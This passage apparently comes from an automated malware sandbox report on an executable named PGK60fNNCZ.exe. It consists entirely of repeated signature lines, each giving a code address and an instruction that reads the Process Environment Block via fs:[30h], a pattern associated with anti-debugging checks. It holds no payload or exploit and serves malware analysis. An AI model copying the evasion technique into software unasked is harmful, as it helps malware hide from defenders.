                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01012349 mov eax, dword ptr fs:[00000030h]6_2_01012349
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0106634F mov eax, dword ptr fs:[00000030h]6_2_0106634F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01038350 mov ecx, dword ptr fs:[00000030h]6_2_01038350
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105A352 mov eax, dword ptr fs:[00000030h]6_2_0105A352
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA02A0 mov eax, dword ptr fs:[00000030h]6_2_00FA02A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA02A0 mov eax, dword ptr fs:[00000030h]6_2_00FA02A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101035C mov eax, dword ptr fs:[00000030h]6_2_0101035C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101035C mov eax, dword ptr fs:[00000030h]6_2_0101035C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101035C mov eax, dword ptr fs:[00000030h]6_2_0101035C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101035C mov ecx, dword ptr fs:[00000030h]6_2_0101035C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101035C mov eax, dword ptr fs:[00000030h]6_2_0101035C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101035C mov eax, dword ptr fs:[00000030h]6_2_0101035C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE284 mov eax, dword ptr fs:[00000030h]6_2_00FCE284
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE284 mov eax, dword ptr fs:[00000030h]6_2_00FCE284
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103437C mov eax, dword ptr fs:[00000030h]6_2_0103437C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8826B mov eax, dword ptr fs:[00000030h]6_2_00F8826B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F94260 mov eax, dword ptr fs:[00000030h]6_2_00F94260
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F94260 mov eax, dword ptr fs:[00000030h]6_2_00F94260
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F94260 mov eax, dword ptr fs:[00000030h]6_2_00F94260
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F96259 mov eax, dword ptr fs:[00000030h]6_2_00F96259
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8A250 mov eax, dword ptr fs:[00000030h]6_2_00F8A250
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010163C0 mov eax, dword ptr fs:[00000030h]6_2_010163C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8823B mov eax, dword ptr fs:[00000030h]6_2_00F8823B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0104C3CD mov eax, dword ptr fs:[00000030h]6_2_0104C3CD
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010343D4 mov eax, dword ptr fs:[00000030h]6_2_010343D4
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010343D4 mov eax, dword ptr fs:[00000030h]6_2_010343D4
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E3DB mov eax, dword ptr fs:[00000030h]6_2_0103E3DB
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E3DB mov eax, dword ptr fs:[00000030h]6_2_0103E3DB
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E3DB mov ecx, dword ptr fs:[00000030h]6_2_0103E3DB
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103E3DB mov eax, dword ptr fs:[00000030h]6_2_0103E3DB
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC63FF mov eax, dword ptr fs:[00000030h]6_2_00FC63FF
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAE3F0 mov eax, dword ptr fs:[00000030h]6_2_00FAE3F0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAE3F0 mov eax, dword ptr fs:[00000030h]6_2_00FAE3F0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAE3F0 mov eax, dword ptr fs:[00000030h]6_2_00FAE3F0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA03E9 mov eax, dword ptr fs:[00000030h]6_2_00FA03E9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA03E9 mov eax, dword ptr fs:[00000030h]6_2_00FA03E9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA03E9 mov eax, dword ptr fs:[00000030h]6_2_00FA03E9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA03E9 mov eax, dword ptr fs:[00000030h]6_2_00FA03E9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA03E9 mov eax, dword ptr fs:[00000030h]6_2_00FA03E9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA03E9 mov eax, dword ptr fs:[00000030h]6_2_00FA03E9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA03E9 mov eax, dword ptr fs:[00000030h]6_2_00FA03E9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA03E9 mov eax, dword ptr fs:[00000030h]6_2_00FA03E9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F983C0 mov eax, dword ptr fs:[00000030h]6_2_00F983C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F983C0 mov eax, dword ptr fs:[00000030h]6_2_00F983C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F983C0 mov eax, dword ptr fs:[00000030h]6_2_00F983C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F983C0 mov eax, dword ptr fs:[00000030h]6_2_00F983C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]6_2_00F9A3C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]6_2_00F9A3C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]6_2_00F9A3C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]6_2_00F9A3C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]6_2_00F9A3C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]6_2_00F9A3C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01018243 mov eax, dword ptr fs:[00000030h]6_2_01018243
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01018243 mov ecx, dword ptr fs:[00000030h]6_2_01018243
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0104A250 mov eax, dword ptr fs:[00000030h]6_2_0104A250
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0104A250 mov eax, dword ptr fs:[00000030h]6_2_0104A250
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0106625D mov eax, dword ptr fs:[00000030h]6_2_0106625D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F88397 mov eax, dword ptr fs:[00000030h]6_2_00F88397
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F88397 mov eax, dword ptr fs:[00000030h]6_2_00F88397
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F88397 mov eax, dword ptr fs:[00000030h]6_2_00F88397
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01040274 mov eax, dword ptr fs:[00000030h]6_2_01040274
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01040274 mov eax, dword ptr fs:[00000030h]6_2_01040274
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01040274 mov eax, dword ptr fs:[00000030h]6_2_01040274
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01040274 mov eax, dword ptr fs:[00000030h]6_2_01040274
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01040274 mov eax, dword ptr fs:[00000030h]6_2_01040274
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01040274 mov eax, dword ptr fs:[00000030h]6_2_01040274
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01040274 mov eax, dword ptr fs:[00000030h]6_2_01040274
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01040274 mov eax, dword ptr fs:[00000030h]6_2_01040274
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01040274 mov eax, dword ptr fs:[00000030h]6_2_01040274
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01040274 mov eax, dword ptr fs:[00000030h]6_2_01040274
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01040274 mov eax, dword ptr fs:[00000030h]6_2_01040274
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01040274 mov eax, dword ptr fs:[00000030h]6_2_01040274
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8E388 mov eax, dword ptr fs:[00000030h]6_2_00F8E388
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8E388 mov eax, dword ptr fs:[00000030h]6_2_00F8E388
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8E388 mov eax, dword ptr fs:[00000030h]6_2_00F8E388
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB438F mov eax, dword ptr fs:[00000030h]6_2_00FB438F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB438F mov eax, dword ptr fs:[00000030h]6_2_00FB438F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01010283 mov eax, dword ptr fs:[00000030h]6_2_01010283
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01010283 mov eax, dword ptr fs:[00000030h]6_2_01010283
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01010283 mov eax, dword ptr fs:[00000030h]6_2_01010283
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010262A0 mov eax, dword ptr fs:[00000030h]6_2_010262A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010262A0 mov ecx, dword ptr fs:[00000030h]6_2_010262A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010262A0 mov eax, dword ptr fs:[00000030h]6_2_010262A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010262A0 mov eax, dword ptr fs:[00000030h]6_2_010262A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010262A0 mov eax, dword ptr fs:[00000030h]6_2_010262A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010262A0 mov eax, dword ptr fs:[00000030h]6_2_010262A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010662D6 mov eax, dword ptr fs:[00000030h]6_2_010662D6
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8C310 mov ecx, dword ptr fs:[00000030h]6_2_00F8C310
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB0310 mov ecx, dword ptr fs:[00000030h]6_2_00FB0310
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA30B mov eax, dword ptr fs:[00000030h]6_2_00FCA30B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA30B mov eax, dword ptr fs:[00000030h]6_2_00FCA30B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA30B mov eax, dword ptr fs:[00000030h]6_2_00FCA30B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01026500 mov eax, dword ptr fs:[00000030h]6_2_01026500
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01064500 mov eax, dword ptr fs:[00000030h]6_2_01064500
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01064500 mov eax, dword ptr fs:[00000030h]6_2_01064500
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01064500 mov eax, dword ptr fs:[00000030h]6_2_01064500
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01064500 mov eax, dword ptr fs:[00000030h]6_2_01064500
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01064500 mov eax, dword ptr fs:[00000030h]6_2_01064500
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01064500 mov eax, dword ptr fs:[00000030h]6_2_01064500
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01064500 mov eax, dword ptr fs:[00000030h]6_2_01064500
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F904E5 mov ecx, dword ptr fs:[00000030h]6_2_00F904E5
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC44B0 mov ecx, dword ptr fs:[00000030h]6_2_00FC44B0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F964AB mov eax, dword ptr fs:[00000030h]6_2_00F964AB
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBA470 mov eax, dword ptr fs:[00000030h]6_2_00FBA470
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBA470 mov eax, dword ptr fs:[00000030h]6_2_00FBA470
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBA470 mov eax, dword ptr fs:[00000030h]6_2_00FBA470
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB245A mov eax, dword ptr fs:[00000030h]6_2_00FB245A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8645D mov eax, dword ptr fs:[00000030h]6_2_00F8645D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010105A7 mov eax, dword ptr fs:[00000030h]6_2_010105A7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010105A7 mov eax, dword ptr fs:[00000030h]6_2_010105A7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010105A7 mov eax, dword ptr fs:[00000030h]6_2_010105A7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE443 mov eax, dword ptr fs:[00000030h]6_2_00FCE443
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE443 mov eax, dword ptr fs:[00000030h]6_2_00FCE443
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE443 mov eax, dword ptr fs:[00000030h]6_2_00FCE443
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE443 mov eax, dword ptr fs:[00000030h]6_2_00FCE443
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE443 mov eax, dword ptr fs:[00000030h]6_2_00FCE443
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE443 mov eax, dword ptr fs:[00000030h]6_2_00FCE443
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE443 mov eax, dword ptr fs:[00000030h]6_2_00FCE443
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE443 mov eax, dword ptr fs:[00000030h]6_2_00FCE443
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA430 mov eax, dword ptr fs:[00000030h]6_2_00FCA430
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8E420 mov eax, dword ptr fs:[00000030h]6_2_00F8E420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8E420 mov eax, dword ptr fs:[00000030h]6_2_00F8E420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8E420 mov eax, dword ptr fs:[00000030h]6_2_00F8E420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8C427 mov eax, dword ptr fs:[00000030h]6_2_00F8C427
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC8402 mov eax, dword ptr fs:[00000030h]6_2_00FC8402
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC8402 mov eax, dword ptr fs:[00000030h]6_2_00FC8402
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC8402 mov eax, dword ptr fs:[00000030h]6_2_00FC8402
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC5ED mov eax, dword ptr fs:[00000030h]6_2_00FCC5ED
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC5ED mov eax, dword ptr fs:[00000030h]6_2_00FCC5ED
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F925E0 mov eax, dword ptr fs:[00000030h]6_2_00F925E0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F965D0 mov eax, dword ptr fs:[00000030h]6_2_00F965D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA5D0 mov eax, dword ptr fs:[00000030h]6_2_00FCA5D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA5D0 mov eax, dword ptr fs:[00000030h]6_2_00FCA5D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE5CF mov eax, dword ptr fs:[00000030h]6_2_00FCE5CF
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE5CF mov eax, dword ptr fs:[00000030h]6_2_00FCE5CF
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB45B1 mov eax, dword ptr fs:[00000030h]6_2_00FB45B1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB45B1 mov eax, dword ptr fs:[00000030h]6_2_00FB45B1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0104A456 mov eax, dword ptr fs:[00000030h]6_2_0104A456
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE59C mov eax, dword ptr fs:[00000030h]6_2_00FCE59C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101C460 mov ecx, dword ptr fs:[00000030h]6_2_0101C460
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC4588 mov eax, dword ptr fs:[00000030h]6_2_00FC4588
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F92582 mov eax, dword ptr fs:[00000030h]6_2_00F92582
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F92582 mov ecx, dword ptr fs:[00000030h]6_2_00F92582
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC656A mov eax, dword ptr fs:[00000030h]6_2_00FC656A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC656A mov eax, dword ptr fs:[00000030h]6_2_00FC656A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC656A mov eax, dword ptr fs:[00000030h]6_2_00FC656A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0104A49A mov eax, dword ptr fs:[00000030h]6_2_0104A49A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F98550 mov eax, dword ptr fs:[00000030h]6_2_00F98550
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F98550 mov eax, dword ptr fs:[00000030h]6_2_00F98550
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101A4B0 mov eax, dword ptr fs:[00000030h]6_2_0101A4B0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE53E mov eax, dword ptr fs:[00000030h]6_2_00FBE53E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE53E mov eax, dword ptr fs:[00000030h]6_2_00FBE53E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE53E mov eax, dword ptr fs:[00000030h]6_2_00FBE53E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE53E mov eax, dword ptr fs:[00000030h]6_2_00FBE53E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE53E mov eax, dword ptr fs:[00000030h]6_2_00FBE53E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0535 mov eax, dword ptr fs:[00000030h]6_2_00FA0535
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0535 mov eax, dword ptr fs:[00000030h]6_2_00FA0535
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0535 mov eax, dword ptr fs:[00000030h]6_2_00FA0535
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0535 mov eax, dword ptr fs:[00000030h]6_2_00FA0535
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0535 mov eax, dword ptr fs:[00000030h]6_2_00FA0535
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0535 mov eax, dword ptr fs:[00000030h]6_2_00FA0535
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100C730 mov eax, dword ptr fs:[00000030h]6_2_0100C730
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA6C7 mov ebx, dword ptr fs:[00000030h]6_2_00FCA6C7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA6C7 mov eax, dword ptr fs:[00000030h]6_2_00FCA6C7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC66B0 mov eax, dword ptr fs:[00000030h]6_2_00FC66B0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01014755 mov eax, dword ptr fs:[00000030h]6_2_01014755
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC6A6 mov eax, dword ptr fs:[00000030h]6_2_00FCC6A6
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101E75D mov eax, dword ptr fs:[00000030h]6_2_0101E75D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F94690 mov eax, dword ptr fs:[00000030h]6_2_00F94690
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F94690 mov eax, dword ptr fs:[00000030h]6_2_00F94690
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC2674 mov eax, dword ptr fs:[00000030h]6_2_00FC2674
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103678E mov eax, dword ptr fs:[00000030h]6_2_0103678E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA660 mov eax, dword ptr fs:[00000030h]6_2_00FCA660
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA660 mov eax, dword ptr fs:[00000030h]6_2_00FCA660
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010447A0 mov eax, dword ptr fs:[00000030h]6_2_010447A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAC640 mov eax, dword ptr fs:[00000030h]6_2_00FAC640
